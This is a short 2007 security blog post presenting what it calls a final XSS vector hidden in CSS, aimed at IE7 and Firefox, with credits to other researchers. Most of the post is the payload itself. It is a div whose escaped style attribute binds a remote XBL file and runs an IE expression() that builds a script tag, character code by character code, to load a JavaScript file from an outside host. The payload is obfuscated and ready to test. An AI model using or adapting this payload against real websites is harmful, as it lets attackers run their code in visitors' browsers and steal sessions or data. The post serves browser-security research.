Ultimate XSS CSS injection
Monday, 26 November 2007
Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles.
The expression part of this technique was first demonstrated by Dan on the slackers forums, nice one Dan sorry about missing you from the credits.
<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs \/xbl\/xbl\.xml\#xss);xx: e\ xp\re\s\s\ i\o\n((win dow.r!=1)  ? eval('x= String.fro mCharCode; scr=docume nt.createE lement(x(1 15,99,114, 105,112,11 6));scr.se tAttribute (x(115,114 ,99),x(104 ,116,116,1 12,58,47,4 7,98,117,1 15,105,110 ,101,115,1 15,105,110 ,102,111,4 6,99,111,4 6,117,107, 47,108,97, 98,115,47, 120,115,11 5,47,120,1 15,115,46, 106,115)); document.g etElementB yId(x( 105 ,110,106,1 01,99,116  )).appendC hild(scr); window.r=1 ;') : 1);" id="inject">test</div>
Please use my tool Hackvertor if you need to decode the IE vector as it will provide you with all the necessary conversions. Please note the vector has been broke up onto multiple lines for viewing purposes, please remove the line breaks when testing the vector.